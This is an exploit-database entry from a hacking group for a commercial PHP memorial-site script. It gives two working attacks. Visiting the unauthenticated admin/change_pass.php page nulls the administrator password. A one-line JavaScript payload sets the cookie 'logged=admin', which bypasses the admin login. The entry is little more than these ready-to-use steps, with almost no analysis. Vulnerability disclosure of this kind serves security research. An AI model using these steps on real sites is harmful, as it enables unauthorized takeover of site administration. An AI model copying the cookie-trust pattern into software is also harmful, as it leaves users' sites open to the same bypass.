Memorial Web Site Script --> Reset Password & Insecure Cookie Handling

2010-04-23T00:00:00
ID 1337DAY-ID-11958
Type zdt
Reporter Chip D3 Bi0s
Modified 2010-04-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ======================================================================
Memorial Web Site Script --> Reset Password & Insecure Cookie Handling
======================================================================

-----------------------------------------------------------------------
Memorial Web Site Script --> Reset Password & Insecure Cookie Handling
-----------------------------------------------------------------------
Author  : Chip D3 Bi0s
Email   : chipdebios[alt+64]gmail.com
Where   : From Remote
Group   : LatinHackTeam
 
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Memorial Web Site Script
Author      : Easy Scripts
Price       : $49
Vendor      : http://www.easy-scripts.net
 
description Bug:
~~~~~~~~~~~~~~~
 
To reset the password just use this:
 
http://127.0.0.1/[path]/admin/change_pass.php
 
so the password will be null, login with single user can
admin:
 
http://127.0.0.1/[path]/admin/
 
--------------------------
 
Insecure Cookie Handling
 
exploit:
javascript:document.cookie="logged=admin;path=/";
 
http://127.0.0.1/[path]/admin/
--------------------------
 
 
 
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++



#  0day.today [2018-04-08]  #